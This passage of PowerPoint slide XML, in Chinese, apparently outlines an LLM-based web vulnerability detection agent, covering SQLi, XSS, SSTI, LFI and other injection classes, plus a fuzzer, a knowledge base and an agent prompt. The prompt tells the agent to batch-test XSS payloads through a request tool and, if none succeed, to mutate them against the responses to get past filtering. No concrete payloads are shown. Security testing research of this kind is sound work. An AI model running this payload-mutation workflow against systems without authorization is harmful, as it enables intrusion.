                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>检测思路</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本框 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8387080" y="3702685"/>
            <a:ext cx="1011555" cy="306705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>Request</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="线形标注 2(带强调线) 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8407400" y="3700780"/>
            <a:ext cx="1116965" cy="701675"/>
          </a:xfrm>
          <a:prstGeom prst="accentCallout2">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 18750"/>
              <a:gd name="adj4" fmla="val -16667"/>
              <a:gd name="adj5" fmla="val -9267"/>
              <a:gd name="adj6" fmla="val -24616"/>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6" name="文本框 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8387715" y="4087495"/>
            <a:ext cx="1011555" cy="306705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="图片 37"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5900420" y="3857625"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="文本框 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7410450" y="6066790"/>
            <a:ext cx="1852295" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>漏洞检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>Agent</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pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="图片 39"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="7665380" y="5213985"/>
            <a:ext cx="540000" cy="54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圆角矩形 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4504055" y="6083300"/>
            <a:ext cx="1023620" cy="548005"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8278"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15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圆角矩形 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3611880" y="3935095"/>
            <a:ext cx="3214370" cy="581660"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8278"/>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圆角矩形 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="3921125"/>
            <a:ext cx="3037840" cy="2623185"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8278"/>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关键步骤三</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检测</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nvGrpSpPr>
          <p:cNvPr id="10" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1570990" y="1825625"/>
            <a:ext cx="5424805" cy="368300"/>
            <a:chOff x="2390" y="1804"/>
            <a:chExt cx="8543" cy="580"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="文本框 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2390" y="1804"/>
              <a:ext cx="1789" cy="580"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>人工经验</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="文本框 1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5063" y="1804"/>
              <a:ext cx="1789" cy="58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LLM</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>变异</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7874" y="1804"/>
              <a:ext cx="3059" cy="580"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>强</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                  <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                </a:rPr>
                <a:t>人工经验</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="图片 5"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4271" y="1817"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="图片 7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7059" y="1817"/>
              <a:ext cx="567" cy="567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340995" y="1833880"/>
            <a:ext cx="1229995" cy="360045"/>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检测模式</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2" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340995" y="1188085"/>
            <a:ext cx="1229995" cy="360045"/>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检测</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类型</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3" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1570990" y="1190625"/>
            <a:ext cx="8780145"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SQLI、XSS、UPLOAD、SSTI、LFI、IDOR、CMD、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>OTHER</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="肘形连接符 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1564640" y="2310765"/>
            <a:ext cx="688975" cy="660400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="肘形连接符 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="6297142" y="1740277"/>
            <a:ext cx="687600" cy="1800000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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16" name="图片 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174750" y="3015615"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="图片 17"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7182485" y="3029585"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947545" y="3227705"/>
            <a:ext cx="1136015"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Prompt</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20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7909560" y="3185795"/>
            <a:ext cx="1136015" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>知识库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="肘形连接符 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="3772507" y="2352647"/>
            <a:ext cx="688340" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50046"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3989705" y="3088005"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4751705" y="3241675"/>
            <a:ext cx="1136015" cy="36830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Fuzzer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="377190" y="3987800"/>
            <a:ext cx="3027045" cy="2553335"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>你必须按照以下流程进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>漏洞检测：</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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>不管是否存在过滤，你都需要首先调用工具：</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&lt;tool&gt;</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    &lt;request&gt;&lt;![CDATA[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>标签的需要测试的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>，为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>]]&gt;&lt;/request&gt;</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&lt;/tool&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>来进行载荷的批量检测，工具会进行载荷的批量测试</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2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>分析批量载荷的执行结果，如果未发现利用成功载荷可以根据响应进行载荷变形，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:cs typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>工具分步测试</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3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
